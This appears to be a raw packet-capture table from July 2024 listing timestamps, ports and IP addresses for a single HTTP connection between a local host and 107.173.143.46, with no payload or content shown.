Jul 26, 2024 09:30:08.396157980 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400191069 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400228024 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400234938 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400257111 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400278091 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400307894 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400321007 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400331974 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400343895 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400346041 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400357008 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400372982 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400511026 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400522947 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400540113 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400547028 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400552034 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400553942 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400558949 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400564909 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400568008 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400569916 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400574923 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400577068 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400583029 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400598049 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400607109 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400614023 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400619030 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400630951 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400643110 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400650978 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400650978 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400655031 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400666952 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400675058 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400675058 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400677919 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400691986 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400696993 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400703907 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400711060 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400723934 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400729895 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400737047 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400737047 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400748014 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400754929 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400758982 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400768995 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400770903 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400782108 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400784969 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400794983 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400800943 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400805950 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400815964 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400816917 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400827885 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400831938 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400846004 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400849104 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400852919 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400860071 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400871992 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400881052 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400883913 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400892973 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400897026 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400904894 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400916100 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400917053 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400924921 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400928974 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400939941 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400943041 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400950909 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400954008 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400960922 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400966883 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400985956 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400985956 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.400995016 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.400998116 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.401009083 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.401020050 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.401020050 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.401031017 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.401034117 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.401042938 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.401046991 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.401053905 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.401066065 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.401066065 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.401074886 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.401093006 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.401099920 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.401185989 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.483145952 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483259916 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483279943 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483293056 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483329058 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.483402014 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.483431101 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483442068 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483453035 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483464003 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483474970 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483485937 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483495951 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483505964 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.483506918 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483516932 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483529091 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.483565092 CEST  49167  80     192.168.2.22    107.173.143.46
                Jul 26, 2024 09:30:08.483608007 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.483860016 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484222889 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484271049 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484316111 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484328032 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484358072 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484383106 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484395981 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484407902 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484417915 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484426022 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484435081 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484447956 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484453917 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484460115 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484472036 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484507084 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484507084 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484507084 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484558105 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484569073 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484580040 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484599113 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484608889 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484711885 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484726906 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484738111 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484749079 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484761953 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484785080 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484837055 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.484867096 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.484878063 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.485058069 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.485105038 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.485193014 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.485203981 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.485240936 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486222029 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486232996 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486243963 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486254930 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486264944 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486275911 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486284018 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486294985 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486311913 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486315966 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486315966 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486325026 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486325026 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486335993 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486339092 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486349106 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486360073 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486361980 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486371040 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486372948 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486382008 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486391068 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486392975 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486398935 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486408949 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486419916 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486421108 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486424923 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486432076 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486443996 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486443996 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486454964 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486466885 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486474991 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486474991 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486478090 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486486912 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486493111 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486502886 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486505985 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486511946 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486515999 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486526966 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486527920 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486536980 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486541986 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486548901 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486555099 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486558914 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486569881 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486582041 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486593962 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486598015 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486598015 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486598015 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486608028 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486613035 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486619949 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486627102 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486643076 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486654997 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486655951 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486655951 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486659050 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486669064 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486679077 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486684084 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486690044 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486701012 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486707926 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486707926 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486717939 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486726999 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486726999 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486728907 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486735106 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486741066 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486753941 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486757040 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486768007 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486776114 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486776114 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486783028 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486788988 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486793995 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486803055 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486813068 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486819029 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486819029 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486828089 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486838102 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486840963 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486846924 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486850023 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486855984 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486857891 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486867905 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486877918 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486884117 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486890078 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486892939 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486903906 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486907959 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486913919 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486922026 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486924887 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486932993 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486934900 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486948013 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486949921 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486958027 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486968040 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486968994 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.486993074 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.486993074 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.487000942 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.487003088 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.487019062 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.487030029 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.487040043 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.487045050 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.487051010 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.487061977 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.487072945 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.487076044 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.487076044 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.487083912 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.487095118 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.487097025 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.487112999 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.487118006 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.487308979 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.487323046 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570336103 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570353985 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570365906 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570377111 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570389032 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570393085 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570400000 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570411921 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570422888 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570425987 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570425987 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570425987 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570434093 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570436001 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570446968 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570452929 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570463896 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570466042 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570477009 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570481062 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570494890 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570494890 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570506096 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570506096 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570517063 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570521116 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570528984 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570537090 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570539951 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570549965 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570550919 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570561886 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570564032 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570574045 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570579052 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570585012 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570594072 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570595980 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570606947 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570612907 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570617914 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570627928 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570627928 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570637941 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570638895 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570648909 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570652962 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570661068 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570667982 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570672989 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570679903 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570684910 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570694923 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570696115 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570704937 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570708036 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570710897 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.570719004 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.570729971 CEST8049167107.173.143.46192.168.2.22
